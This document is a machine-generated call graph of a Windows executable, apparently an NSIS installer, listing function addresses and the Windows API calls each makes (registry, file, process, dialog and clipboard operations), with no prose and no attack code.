3388 402c41 17 API calls 3387->3388 3389 4023f6 3388->3389 3390 402c41 17 API calls 3389->3390 3391 402400 3390->3391 3404 402cd1 3391->3404 3394 402ac5 3395 402438 3400 402444 3395->3400 3408 402c1f 3395->3408 3396 402c41 17 API calls 3397 40242e lstrlenW 3396->3397 3397->3395 3399 402463 RegSetValueExW 3402 402479 RegCloseKey 3399->3402 3400->3399 3411 403116 3400->3411 3402->3394 3405 402cec 3404->3405 3432 40611f 3405->3432 3409 4062a6 17 API calls 3408->3409 3410 402c34 3409->3410 3410->3400 3412 40312f 3411->3412 3413 40315a 3412->3413 3448 403311 SetFilePointer 3412->3448 3436 4032fb 3413->3436 3417 403177 GetTickCount 3428 40318a 3417->3428 3418 40329b 3419 40329f 3418->3419 3424 4032b7 3418->3424 3421 4032fb ReadFile 3419->3421 3420 403285 3420->3399 3421->3420 3422 4032fb ReadFile 3422->3424 3423 4032fb ReadFile 3423->3428 3424->3420 3424->3422 3425 405e2c WriteFile 3424->3425 3425->3424 3427 4031f0 GetTickCount 3427->3428 3428->3420 3428->3423 3428->3427 3429 403219 MulDiv wsprintfW 3428->3429 3439 4067df 3428->3439 3446 405e2c WriteFile 3428->3446 3430 4052ec 24 API calls 3429->3430 3430->3428 3433 40612e 3432->3433 3434 402410 3433->3434 3435 406139 RegCreateKeyExW 3433->3435 3434->3394 3434->3395 3434->3396 3435->3434 3449 405dfd ReadFile 3436->3449 3440 406804 3439->3440 3441 40680c 3439->3441 3440->3428 3441->3440 3442 406893 GlobalFree 3441->3442 3443 40689c GlobalAlloc 3441->3443 3444 406913 GlobalAlloc 3441->3444 3445 40690a GlobalFree 3441->3445 3442->3443 3443->3440 3443->3441 3444->3440 3444->3441 3445->3444 3447 405e4a 3446->3447 3447->3428 3448->3413 3450 403165 3449->3450 3450->3417 3450->3418 3450->3420 3495 402868 3496 402c41 17 API calls 3495->3496 3497 40286f FindFirstFileW 3496->3497 3498 402897 3497->3498 3502 402882 3497->3502 3503 4061cb wsprintfW 3498->3503 3500 4028a0 3504 406284 lstrcpynW 3500->3504 3503->3500 3504->3502 4222 404c68 GetDlgItem GetDlgItem 4223 404cba 7 API calls 4222->4223 4238 404ed3 4222->4238 4224 404d50 
SendMessageW 4223->4224 4225 404d5d DeleteObject 4223->4225 4224->4225 4226 404d66 4225->4226 4228 404d9d 4226->4228 4231 4062a6 17 API calls 4226->4231 4227 404fb7 4230 405063 4227->4230 4233 404ec6 4227->4233 4241 405010 SendMessageW 4227->4241 4229 4041fb 18 API calls 4228->4229 4232 404db1 4229->4232 4235 405075 4230->4235 4236 40506d SendMessageW 4230->4236 4237 404d7f SendMessageW SendMessageW 4231->4237 4240 4041fb 18 API calls 4232->4240 4242 404262 8 API calls 4233->4242 4234 404f44 4234->4227 4243 404fa9 SendMessageW 4234->4243 4244 405087 ImageList_Destroy 4235->4244 4245 40508e 4235->4245 4252 40509e 4235->4252 4236->4235 4237->4226 4238->4227 4238->4234 4239 404bb6 5 API calls 4238->4239 4239->4234 4255 404dbf 4240->4255 4241->4233 4247 405025 SendMessageW 4241->4247 4248 405259 4242->4248 4243->4227 4244->4245 4249 405097 GlobalFree 4245->4249 4245->4252 4246 40520d 4246->4233 4253 40521f ShowWindow GetDlgItem ShowWindow 4246->4253 4251 405038 4247->4251 4249->4252 4250 404e94 GetWindowLongW SetWindowLongW 4254 404ead 4250->4254 4261 405049 SendMessageW 4251->4261 4252->4246 4265 404c36 4 API calls 4252->4265 4267 4050d9 4252->4267 4253->4233 4256 404eb3 ShowWindow 4254->4256 4257 404ecb 4254->4257 4255->4250 4260 404e0f SendMessageW 4255->4260 4262 404e8e 4255->4262 4263 404e4b SendMessageW 4255->4263 4264 404e5c SendMessageW 4255->4264 4273 404230 SendMessageW 4256->4273 4274 404230 SendMessageW 4257->4274 4260->4255 4261->4230 4262->4250 4262->4254 4263->4255 4264->4255 4265->4267 4266 4051e3 InvalidateRect 4266->4246 4268 4051f9 4266->4268 4269 405107 SendMessageW 4267->4269 4272 40511d 4267->4272 4275 404b71 4268->4275 4269->4272 4271 405191 SendMessageW SendMessageW 4271->4272 4272->4266 4272->4271 4273->4233 4274->4238 4278 404aa8 4275->4278 4277 404b86 4277->4246 4279 404ac1 4278->4279 4280 4062a6 17 API calls 4279->4280 4281 404b25 4280->4281 4282 4062a6 17 API calls 4281->4282 4283 404b30 4282->4283 4284 4062a6 17 API calls 4283->4284 4285 
404b46 lstrlenW wsprintfW SetDlgItemTextW 4284->4285 4285->4277 4286 401968 4287 402c1f 17 API calls 4286->4287 4288 40196f 4287->4288 4289 402c1f 17 API calls 4288->4289 4290 40197c 4289->4290 4291 402c41 17 API calls 4290->4291 4292 401993 lstrlenW 4291->4292 4294 4019a4 4292->4294 4293 4019e5 4294->4293 4298 406284 lstrcpynW 4294->4298 4296 4019d5 4296->4293 4297 4019da lstrlenW 4296->4297 4297->4293 4298->4296 4299 40166a 4300 402c41 17 API calls 4299->4300 4301 401670 4300->4301 4302 4065c7 2 API calls 4301->4302 4303 401676 4302->4303 4304 40436b lstrlenW 4305 40438a 4304->4305 4306 40438c WideCharToMultiByte 4304->4306 4305->4306 4307 4046ec 4308 404718 4307->4308 4309 404729 4307->4309 4368 4058ce GetDlgItemTextW 4308->4368 4311 404735 GetDlgItem 4309->4311 4317 404794 4309->4317 4313 404749 4311->4313 4312 404723 4315 406518 5 API calls 4312->4315 4319 40475d SetWindowTextW 4313->4319 4324 405c04 4 API calls 4313->4324 4314 404878 4316 404a27 4314->4316 4370 4058ce GetDlgItemTextW 4314->4370 4315->4309 4323 404262 8 API calls 4316->4323 4317->4314 4317->4316 4320 4062a6 17 API calls 4317->4320 4322 4041fb 18 API calls 4319->4322 4325 404808 SHBrowseForFolderW 4320->4325 4321 4048a8 4326 405c61 18 API calls 4321->4326 4327 404779 4322->4327 4328 404a3b 4323->4328 4329 404753 4324->4329 4325->4314 4330 404820 CoTaskMemFree 4325->4330 4331 4048ae 4326->4331 4332 4041fb 18 API calls 4327->4332 4329->4319 4333 405b59 3 API calls 4329->4333 4334 405b59 3 API calls 4330->4334 4371 406284 lstrcpynW 4331->4371 4335 404787 4332->4335 4333->4319 4336 40482d 4334->4336 4369 404230 SendMessageW 4335->4369 4339 404864 SetDlgItemTextW 4336->4339 4344 4062a6 17 API calls 4336->4344 4339->4314 4340 40478d 4342 40665e 5 API calls 4340->4342 4341 4048c5 4343 40665e 5 API calls 4341->4343 4342->4317 4351 4048cc 4343->4351 4345 40484c lstrcmpiW 4344->4345 4345->4339 4348 40485d lstrcatW 4345->4348 4346 40490d 4372 406284 lstrcpynW 4346->4372 4348->4339 4349 404914 4350 405c04 
4 API calls 4349->4350 4352 40491a GetDiskFreeSpaceW 4350->4352 4351->4346 4354 405ba5 2 API calls 4351->4354 4356 404965 4351->4356 4355 40493e MulDiv 4352->4355 4352->4356 4354->4351 4355->4356 4357 4049d6 4356->4357 4358 404b71 20 API calls 4356->4358 4359 4049f9 4357->4359 4361 40140b 2 API calls 4357->4361 4360 4049c3 4358->4360 4373 40421d KiUserCallbackDispatcher 4359->4373 4363 4049d8 SetDlgItemTextW 4360->4363 4364 4049c8 4360->4364 4361->4359 4363->4357 4366 404aa8 20 API calls 4364->4366 4365 404a15 4365->4316 4374 404645 4365->4374 4366->4357 4368->4312 4369->4340 4370->4321 4371->4341 4372->4349 4373->4365 4375 404653 4374->4375 4376 404658 SendMessageW 4374->4376 4375->4376 4376->4316 3622 40176f 3623 402c41 17 API calls 3622->3623 3624 401776 3623->3624 3625 401796 3624->3625 3626 40179e 3624->3626 3664 406284 lstrcpynW 3625->3664 3665 406284 lstrcpynW 3626->3665 3629 4017a9 3666 405b59 lstrlenW CharPrevW 3629->3666 3630 40179c 3633 406518 5 API calls 3630->3633 3644 4017bb 3633->3644 3637 4017cd CompareFileTime 3637->3644 3638 40188d 3639 4052ec 24 API calls 3638->3639 3642 401897 3639->3642 3640 4052ec 24 API calls 3643 401879 3640->3643 3641 406284 lstrcpynW 3641->3644 3645 403116 35 API calls 3642->3645 3644->3637 3644->3638 3644->3641 3648 4062a6 17 API calls 3644->3648 3659 401864 3644->3659 3660 405d55 GetFileAttributesW 3644->3660 3663 405d7a GetFileAttributesW CreateFileW 3644->3663 3669 4065c7 FindFirstFileW 3644->3669 3672 4058ea 3644->3672 3646 4018aa 3645->3646 3647 4018be SetFileTime 3646->3647 3649 4018d0 CloseHandle 3646->3649 3647->3649 3648->3644 3649->3643 3650 4018e1 3649->3650 3651 4018e6 3650->3651 3652 4018f9 3650->3652 3653 4062a6 17 API calls 3651->3653 3654 4062a6 17 API calls 3652->3654 3655 4018ee lstrcatW 3653->3655 3656 401901 3654->3656 3655->3656 3658 4058ea MessageBoxIndirectW 3656->3658 3658->3643 3659->3640 3659->3643 3661 405d74 3660->3661 3662 405d67 SetFileAttributesW 3660->3662 3661->3644 3662->3661 3663->3644 
3664->3630 3665->3629 3667 4017af lstrcatW 3666->3667 3668 405b75 lstrcatW 3666->3668 3667->3630 3668->3667 3670 4065dd FindClose 3669->3670 3671 4065e8 3669->3671 3670->3671 3671->3644 3673 4058ff 3672->3673 3674 40594b 3673->3674 3675 405913 MessageBoxIndirectW 3673->3675 3674->3644 3675->3674 4377 4027ef 4378 4027f6 4377->4378 4380 402a70 4377->4380 4379 402c1f 17 API calls 4378->4379 4381 4027fd 4379->4381 4382 40280c SetFilePointer 4381->4382 4382->4380 4383 40281c 4382->4383 4385 4061cb wsprintfW 4383->4385 4385->4380 4386 401a72 4387 402c1f 17 API calls 4386->4387 4388 401a7b 4387->4388 4389 402c1f 17 API calls 4388->4389 4390 401a20 4389->4390 3677 401573 3678 401583 ShowWindow 3677->3678 3679 40158c 3677->3679 3678->3679 3680 402ac5 3679->3680 3681 40159a ShowWindow 3679->3681 3681->3680 4398 402df3 4399 402e05 SetTimer 4398->4399 4401 402e1e 4398->4401 4399->4401 4400 402e73 4401->4400 4402 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4401->4402 4402->4400 4403 401cf3 4404 402c1f 17 API calls 4403->4404 4405 401cf9 IsWindow 4404->4405 4406 401a20 4405->4406 4407 4014f5 SetForegroundWindow 4408 402ac5 4407->4408 4409 402576 4410 402c41 17 API calls 4409->4410 4411 40257d 4410->4411 4414 405d7a GetFileAttributesW CreateFileW 4411->4414 4413 402589 4414->4413 3686 401b77 3687 401b84 3686->3687 3688 401bc8 3686->3688 3689 4022e4 3687->3689 3695 401b9b 3687->3695 3690 401bf2 GlobalAlloc 3688->3690 3691 401bcd 3688->3691 3692 4062a6 17 API calls 3689->3692 3693 4062a6 17 API calls 3690->3693 3699 401c0d 3691->3699 3707 406284 lstrcpynW 3691->3707 3694 4022f1 3692->3694 3693->3699 3701 4058ea MessageBoxIndirectW 3694->3701 3705 406284 lstrcpynW 3695->3705 3698 401bdf GlobalFree 3698->3699 3700 401baa 3706 406284 lstrcpynW 3700->3706 3701->3699 3703 401bb9 3708 406284 lstrcpynW 3703->3708 3705->3700 3706->3703 3707->3698 3708->3699 4415 4024f8 4416 402c81 17 API calls 4415->4416 4417 402502 4416->4417 4418 402c1f 17 API calls 4417->4418 4419 40250b 
4418->4419 4420 402533 RegEnumValueW 4419->4420 4421 402527 RegEnumKeyW 4419->4421 4423 40288b 4419->4423 4422 402548 RegCloseKey 4420->4422 4421->4422 4422->4423 4425 40167b 4426 402c41 17 API calls 4425->4426 4427 401682 4426->4427 4428 402c41 17 API calls 4427->4428 4429 40168b 4428->4429 4430 402c41 17 API calls 4429->4430 4431 401694 MoveFileW 4430->4431 4432 4016a0 4431->4432 4433 4016a7 4431->4433 4434 401423 24 API calls 4432->4434 4435 4065c7 2 API calls 4433->4435 4437 402250 4433->4437 4434->4437 4436 4016b6 4435->4436 4436->4437 4438 40604a 36 API calls 4436->4438 4438->4432 4439 401e7d 4440 402c41 17 API calls 4439->4440 4441 401e83 4440->4441 4442 402c41 17 API calls 4441->4442 4443 401e8c 4442->4443 4444 402c41 17 API calls 4443->4444 4445 401e95 4444->4445 4446 402c41 17 API calls 4445->4446 4447 401e9e 4446->4447 4448 401423 24 API calls 4447->4448 4449 401ea5 4448->4449 4456 4058b0 ShellExecuteExW 4449->4456 4451 401ee7 4452 40670f 5 API calls 4451->4452 4454 40288b 4451->4454 4453 401f01 CloseHandle 4452->4453 4453->4454 4456->4451 4457 4019ff 4458 402c41 17 API calls 4457->4458 4459 401a06 4458->4459 4460 402c41 17 API calls 4459->4460 4461 401a0f 4460->4461 4462 401a16 lstrcmpiW 4461->4462 4463 401a28 lstrcmpW 4461->4463 4464 401a1c 4462->4464 4463->4464 4465 401000 4466 401037 BeginPaint GetClientRect 4465->4466 4467 40100c DefWindowProcW 4465->4467 4469 4010f3 4466->4469 4470 401179 4467->4470 4471 401073 CreateBrushIndirect FillRect DeleteObject 4469->4471 4472 4010fc 4469->4472 4471->4469 4473 401102 CreateFontIndirectW 4472->4473 4474 401167 EndPaint 4472->4474 4473->4474 4475 401112 6 API calls 4473->4475 4474->4470 4475->4474 4483 401503 4484 40150b 4483->4484 4486 40151e 4483->4486 4485 402c1f 17 API calls 4484->4485 4485->4486 3451 402104 3452 402c41 17 API calls 3451->3452 3453 40210b 3452->3453 3454 402c41 17 API calls 3453->3454 3455 402115 3454->3455 3456 402c41 17 API calls 3455->3456 3457 40211f 3456->3457 3458 402c41 17 API 
calls 3457->3458 3459 402129 3458->3459 3460 402c41 17 API calls 3459->3460 3462 402133 3460->3462 3461 402172 CoCreateInstance 3466 402191 3461->3466 3462->3461 3463 402c41 17 API calls 3462->3463 3463->3461 3464 401423 24 API calls 3465 402250 3464->3465 3466->3464 3466->3465 4487 402484 4488 402c81 17 API calls 4487->4488 4489 40248e 4488->4489 4490 402c41 17 API calls 4489->4490 4491 402497 4490->4491 4492 4024a2 RegQueryValueExW 4491->4492 4493 40288b 4491->4493 4494 4024c2 4492->4494 4497 4024c8 RegCloseKey 4492->4497 4494->4497 4498 4061cb wsprintfW 4494->4498 4497->4493 4498->4497 3467 401f06 3468 402c41 17 API calls 3467->3468 3469 401f0c 3468->3469 3470 4052ec 24 API calls 3469->3470 3471 401f16 3470->3471 3482 40586d CreateProcessW 3471->3482 3474 401f3f CloseHandle 3478 40288b 3474->3478 3477 401f31 3479 401f41 3477->3479 3480 401f36 3477->3480 3479->3474 3490 4061cb wsprintfW 3480->3490 3483 4058a0 CloseHandle 3482->3483 3484 401f1c 3482->3484 3483->3484 3484->3474 3484->3478 3485 40670f WaitForSingleObject 3484->3485 3486 406729 3485->3486 3487 40673b GetExitCodeProcess 3486->3487 3491 40669a 3486->3491 3487->3477 3490->3474 3492 4066b7 PeekMessageW 3491->3492 3493 4066c7 WaitForSingleObject 3492->3493 3494 4066ad DispatchMessageW 3492->3494 3493->3486 3494->3492 3563 401f8c 3564 402c41 17 API calls 3563->3564 3565 401f93 3564->3565 3566 40665e 5 API calls 3565->3566 3567 401fa2 GetFileVersionInfoSizeW 3566->3567 3568 402ac5 3567->3568 3569 401fbe GlobalAlloc 3567->3569 3569->3568 3570 401fd2 3569->3570 3571 40665e 5 API calls 3570->3571 3572 401fd9 3571->3572 3573 40665e 5 API calls 3572->3573 3575 401fe3 3573->3575 3574 402026 3574->3568 3575->3574 3579 4061cb wsprintfW 3575->3579 3577 402018 3580 4061cb wsprintfW 3577->3580 3579->3577 3580->3574 4499 40190c 4500 401943 4499->4500 4501 402c41 17 API calls 4500->4501 4502 401948 4501->4502 4503 405996 67 API calls 4502->4503 4504 401951 4503->4504 4505 40230c 4506 402314 4505->4506 4507 40231a 
4505->4507 4508 402c41 17 API calls 4506->4508 4509 402328 4507->4509 4511 402c41 17 API calls 4507->4511 4508->4507 4510 402336 4509->4510 4512 402c41 17 API calls 4509->4512 4513 402c41 17 API calls 4510->4513 4511->4509 4512->4510 4514 40233f WritePrivateProfileStringW 4513->4514 3588 40238e 3589 4023c1 3588->3589 3590 402396 3588->3590 3592 402c41 17 API calls 3589->3592 3600 402c81 3590->3600 3594 4023c8 3592->3594 3605 402cff 3594->3605 3595 4023a7 3598 402c41 17 API calls 3595->3598 3597 4023d5 3599 4023ae RegDeleteValueW RegCloseKey 3598->3599 3599->3597 3601 402c41 17 API calls 3600->3601 3602 402c98 3601->3602 3603 4060f1 RegOpenKeyExW 3602->3603 3604 40239d 3603->3604 3604->3595 3604->3597 3606 402d13 3605->3606 3607 402d0c 3605->3607 3606->3607 3609 402d44 3606->3609 3607->3597 3610 4060f1 RegOpenKeyExW 3609->3610 3611 402d72 3610->3611 3612 402dec 3611->3612 3616 402d76 3611->3616 3612->3607 3613 402d98 RegEnumKeyW 3614 402daf RegCloseKey 3613->3614 3613->3616 3617 40665e 5 API calls 3614->3617 3615 402dd0 RegCloseKey 3615->3612 3616->3613 3616->3614 3616->3615 3618 402d44 6 API calls 3616->3618 3619 402dbf 3617->3619 3618->3616 3620 402de0 RegDeleteKeyW 3619->3620 3621 402dc3 3619->3621 3620->3612 3621->3612 4515 40698e 4521 406812 4515->4521 4516 40717d 4517 406893 GlobalFree 4518 40689c GlobalAlloc 4517->4518 4518->4516 4518->4521 4519 406913 GlobalAlloc 4519->4516 4519->4521 4520 40690a GlobalFree 4520->4519 4521->4516 4521->4517 4521->4518 4521->4519 4521->4520 4522 40190f 4523 402c41 17 API calls 4522->4523 4524 401916 4523->4524 4525 4058ea MessageBoxIndirectW 4524->4525 4526 40191f 4525->4526 4527 401491 4528 4052ec 24 API calls 4527->4528 4529 401498 4528->4529 4530 401d14 4531 402c1f 17 API calls 4530->4531 4532 401d1b 4531->4532 4533 402c1f 17 API calls 4532->4533 4534 401d27 GetDlgItem 4533->4534 4535 402592 4534->4535 4543 402598 4544 4025c7 4543->4544 4545 4025ac 4543->4545 4547 4025fb 4544->4547 4548 4025cc 4544->4548 4546 402c1f 17 API 
calls 4545->4546 4553 4025b3 4546->4553 4550 402c41 17 API calls 4547->4550 4549 402c41 17 API calls 4548->4549 4551 4025d3 WideCharToMultiByte lstrlenA 4549->4551 4552 402602 lstrlenW 4550->4552 4551->4553 4552->4553 4554 40262f 4553->4554 4556 405e5b 5 API calls 4553->4556 4557 402645 4553->4557 4555 405e2c WriteFile 4554->4555 4554->4557 4555->4557 4556->4554 4558 40149e 4559 4014ac PostQuitMessage 4558->4559 4560 4022f7 4558->4560 4559->4560 4561 401c1f 4562 402c1f 17 API calls 4561->4562 4563 401c26 4562->4563 4564 402c1f 17 API calls 4563->4564 4565 401c33 4564->4565 4566 401c48 4565->4566 4567 402c41 17 API calls 4565->4567 4568 401c58 4566->4568 4569 402c41 17 API calls 4566->4569 4567->4566 4570 401c63 4568->4570 4571 401caf 4568->4571 4569->4568 4573 402c1f 17 API calls 4570->4573 4572 402c41 17 API calls 4571->4572 4574 401cb4 4572->4574 4575 401c68 4573->4575 4576 402c41 17 API calls 4574->4576 4577 402c1f 17 API calls 4575->4577 4578 401cbd FindWindowExW 4576->4578 4579 401c74 4577->4579 4582 401cdf 4578->4582 4580 401c81 SendMessageTimeoutW 4579->4580 4581 401c9f SendMessageW 4579->4581 4580->4582 4581->4582 4583 402aa0 SendMessageW 4584 402ac5 4583->4584 4585 402aba InvalidateRect 4583->4585 4585->4584 4586 402821 4587 402827 4586->4587 4588 40282f FindClose 4587->4588 4589 402ac5 4587->4589 4588->4589 3276 403d22 3277 403e75 3276->3277 3278 403d3a 3276->3278 3279 403ec6 3277->3279 3280 403e86 GetDlgItem GetDlgItem 3277->3280 3278->3277 3281 403d46 3278->3281 3283 403f20 3279->3283 3293 401389 2 API calls 3279->3293 3282 4041fb 18 API calls 3280->3282 3284 403d51 SetWindowPos 3281->3284 3285 403d64 3281->3285 3288 403eb0 SetClassLongW 3282->3288 3308 403e70 3283->3308 3347 404247 3283->3347 3284->3285 3286 403d81 3285->3286 3287 403d69 ShowWindow 3285->3287 3290 403da3 3286->3290 3291 403d89 DestroyWindow 3286->3291 3287->3286 3292 40140b 2 API calls 3288->3292 3294 403da8 SetWindowLongW 3290->3294 3295 403db9 3290->3295 3346 404184 3291->3346 
3292->3279 3296 403ef8 3293->3296 3294->3308 3299 403e62 3295->3299 3300 403dc5 GetDlgItem 3295->3300 3296->3283 3301 403efc SendMessageW 3296->3301 3297 40140b 2 API calls 3320 403f32 3297->3320 3298 404186 DestroyWindow EndDialog 3298->3346 3369 404262 3299->3369 3303 403df5 3300->3303 3304 403dd8 SendMessageW IsWindowEnabled 3300->3304 3301->3308 3302 4041b5 ShowWindow 3302->3308 3307 403dfa 3303->3307 3309 403e02 3303->3309 3311 403e49 SendMessageW 3303->3311 3312 403e15 3303->3312 3304->3303 3304->3308 3306 4062a6 17 API calls 3306->3320 3366 4041d4 3307->3366 3309->3307 3309->3311 3311->3299 3313 403e32 3312->3313 3314 403e1d 3312->3314 3317 40140b 2 API calls 3313->3317 3363 40140b 3314->3363 3315 403e30 3315->3299 3319 403e39 3317->3319 3318 4041fb 18 API calls 3318->3320 3319->3299 3319->3307 3320->3297 3320->3298 3320->3306 3320->3308 3320->3318 3337 4040c6 DestroyWindow 3320->3337 3350 4041fb 3320->3350 3322 403fad GetDlgItem 3323 403fc2 3322->3323 3324 403fca ShowWindow KiUserCallbackDispatcher 3322->3324 3323->3324 3353 40421d KiUserCallbackDispatcher 3324->3353 3326 403ff4 EnableWindow 3331 404008 3326->3331 3327 40400d GetSystemMenu EnableMenuItem SendMessageW 3328 40403d SendMessageW 3327->3328 3327->3331 3328->3331 3331->3327 3354 404230 SendMessageW 3331->3354 3355 403d03 3331->3355 3358 406284 lstrcpynW 3331->3358 3333 40406c lstrlenW 3334 4062a6 17 API calls 3333->3334 3335 404082 SetWindowTextW 3334->3335 3359 401389 3335->3359 3338 4040e0 CreateDialogParamW 3337->3338 3337->3346 3339 404113 3338->3339 3338->3346 3340 4041fb 18 API calls 3339->3340 3341 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3340->3341 3342 401389 2 API calls 3341->3342 3343 404164 3342->3343 3343->3308 3344 40416c ShowWindow 3343->3344 3345 404247 SendMessageW 3344->3345 3345->3346 3346->3302 3346->3308 3348 404250 SendMessageW 3347->3348 3349 40425f 3347->3349 3348->3349 3349->3320 3351 4062a6 17 API calls 3350->3351 3352 404206 SetDlgItemTextW 3351->3352 
3352->3322 3353->3326 3354->3331 3356 4062a6 17 API calls 3355->3356 3357 403d11 SetWindowTextW 3356->3357 3357->3331 3358->3333 3361 401390 3359->3361 3360 4013fe 3360->3320 3361->3360 3362 4013cb MulDiv SendMessageW 3361->3362 3362->3361 3364 401389 2 API calls 3363->3364 3365 401420 3364->3365 3365->3307 3367 4041e1 SendMessageW 3366->3367 3368 4041db 3366->3368 3367->3315 3368->3367 3370 404325 3369->3370 3371 40427a GetWindowLongW 3369->3371 3370->3308 3371->3370 3372 40428f 3371->3372 3372->3370 3373 4042bc GetSysColor 3372->3373 3374 4042bf 3372->3374 3373->3374 3375 4042c5 SetTextColor 3374->3375 3376 4042cf SetBkMode 3374->3376 3375->3376 3377 4042e7 GetSysColor 3376->3377 3378 4042ed 3376->3378 3377->3378 3379 4042f4 SetBkColor 3378->3379 3380 4042fe 3378->3380 3379->3380 3380->3370 3381 404311 DeleteObject 3380->3381 3382 404318 CreateBrushIndirect 3380->3382 3381->3382 3382->3370 3383 4015a3 3384 402c41 17 API calls 3383->3384 3385 4015aa SetFileAttributesW 3384->3385 3386 4015bc 3385->3386 4590 4046a5 4591 4046b5 4590->4591 4592 4046db 4590->4592 4593 4041fb 18 API calls 4591->4593 4594 404262 8 API calls 4592->4594 4596 4046c2 SetDlgItemTextW 4593->4596 4595 4046e7 4594->4595 4596->4592 4597 4029a8 4598 402c1f 17 API calls 4597->4598 4599 4029ae 4598->4599 4600 4029d5 4599->4600 4601 4029ee 4599->4601 4608 40288b 4599->4608 4602 4029da 4600->4602 4603 4029eb 4600->4603 4604 402a08 4601->4604 4605 4029f8 4601->4605 4611 406284 lstrcpynW 4602->4611 4603->4608 4612 4061cb wsprintfW 4603->4612 4607 4062a6 17 API calls 4604->4607 4606 402c1f 17 API calls 4605->4606 4606->4603 4607->4603 4611->4608 4612->4608 3508 40542b 3509 4055d5 3508->3509 3510 40544c GetDlgItem GetDlgItem GetDlgItem 3508->3510 3512 405606 3509->3512 3513 4055de GetDlgItem CreateThread CloseHandle 3509->3513 3553 404230 SendMessageW 3510->3553 3515 405631 3512->3515 3516 405656 3512->3516 3517 40561d ShowWindow ShowWindow 3512->3517 3513->3512 3556 4053bf OleInitialize 3513->3556 3514 
4054bc 3522 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3514->3522 3518 405691 3515->3518 3519 405645 3515->3519 3520 40566b ShowWindow 3515->3520 3521 404262 8 API calls 3516->3521 3555 404230 SendMessageW 3517->3555 3518->3516 3530 40569f SendMessageW 3518->3530 3524 4041d4 SendMessageW 3519->3524 3526 40568b 3520->3526 3527 40567d 3520->3527 3525 405664 3521->3525 3528 405531 3522->3528 3529 405515 SendMessageW SendMessageW 3522->3529 3524->3516 3532 4041d4 SendMessageW 3526->3532 3531 4052ec 24 API calls 3527->3531 3533 405544 3528->3533 3534 405536 SendMessageW 3528->3534 3529->3528 3530->3525 3535 4056b8 CreatePopupMenu 3530->3535 3531->3526 3532->3518 3537 4041fb 18 API calls 3533->3537 3534->3533 3536 4062a6 17 API calls 3535->3536 3539 4056c8 AppendMenuW 3536->3539 3538 405554 3537->3538 3542 405591 GetDlgItem SendMessageW 3538->3542 3543 40555d ShowWindow 3538->3543 3540 4056e5 GetWindowRect 3539->3540 3541 4056f8 TrackPopupMenu 3539->3541 3540->3541 3541->3525 3544 405713 3541->3544 3542->3525 3547 4055b8 SendMessageW SendMessageW 3542->3547 3545 405580 3543->3545 3546 405573 ShowWindow 3543->3546 3548 40572f SendMessageW 3544->3548 3554 404230 SendMessageW 3545->3554 3546->3545 3547->3525 3548->3548 3549 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3548->3549 3551 405771 SendMessageW 3549->3551 3551->3551 3552 40579a GlobalUnlock SetClipboardData CloseClipboard 3551->3552 3552->3525 3553->3514 3554->3542 3555->3515 3557 404247 SendMessageW 3556->3557 3560 4053e2 3557->3560 3558 405409 3559 404247 SendMessageW 3558->3559 3561 40541b OleUninitialize 3559->3561 3560->3558 3562 401389 2 API calls 3560->3562 3562->3560 4620 4028ad 4621 402c41 17 API calls 4620->4621 4622 4028bb 4621->4622 4623 4028d1 4622->4623 4624 402c41 17 API calls 4622->4624 4625 405d55 2 API calls 4623->4625 4624->4623 4626 4028d7 4625->4626 4648 405d7a GetFileAttributesW CreateFileW 4626->4648 4628 4028e4 4629 4028f0 GlobalAlloc 4628->4629 4630 402987 
4628->4630 4633 402909 4629->4633 4634 40297e CloseHandle 4629->4634 4631 4029a2 4630->4631 4632 40298f DeleteFileW 4630->4632 4632->4631 4649 403311 SetFilePointer 4633->4649 4634->4630 4636 40290f 4637 4032fb ReadFile 4636->4637 4638 402918 GlobalAlloc 4637->4638 4639 402928 4638->4639 4640 40295c 4638->4640 4641 403116 35 API calls 4639->4641 4642 405e2c WriteFile 4640->4642 4647 402935 4641->4647 4643 402968 GlobalFree 4642->4643 4644 403116 35 API calls 4643->4644 4645 40297b 4644->4645 4645->4634 4646 402953 GlobalFree 4646->4640 4647->4646 4648->4628 4649->4636 3676 4058b0 ShellExecuteExW 4650 401a30 4651 402c41 17 API calls 4650->4651 4652 401a39 ExpandEnvironmentStringsW 4651->4652 4653 401a4d 4652->4653 4655 401a60 4652->4655 4654 401a52 lstrcmpW 4653->4654 4653->4655 4654->4655 4656 404331 lstrcpynW lstrlenW 4657 402032 4658 402044 4657->4658 4659 4020f6 4657->4659 4660 402c41 17 API calls 4658->4660 4661 401423 24 API calls 4659->4661 4662 40204b 4660->4662 4668 402250 4661->4668 4663 402c41 17 API calls 4662->4663 4664 402054 4663->4664 4665 40206a LoadLibraryExW 4664->4665 4666 40205c GetModuleHandleW 4664->4666 4665->4659 4667 40207b 4665->4667 4666->4665 4666->4667 4677 4066cd WideCharToMultiByte 4667->4677 4671 4020c5 4673 4052ec 24 API calls 4671->4673 4672 40208c 4674 401423 24 API calls 4672->4674 4675 40209c 4672->4675 4673->4675 4674->4675 4675->4668 4676 4020e8 FreeLibrary 4675->4676 4676->4668 4678 4066f7 GetProcAddress 4677->4678 4679 402086 4677->4679 4678->4679 4679->4671 4679->4672 4680 403932 4681 40393d 4680->4681 4682 403944 GlobalAlloc 4681->4682 4683 403941 4681->4683 4682->4683 3682 401735 3683 402c41 17 API calls 3682->3683 3684 40173c SearchPathW 3683->3684 3685 401757 3684->3685 4689 402a35 4690 402c1f 17 API calls 4689->4690 4691 402a3b 4690->4691 4692 402a72 4691->4692 4693 40288b 4691->4693 4695 402a4d 4691->4695 4692->4693 4694 4062a6 17 API calls 4692->4694 4694->4693 4695->4693 4697 4061cb wsprintfW 4695->4697 4697->4693 
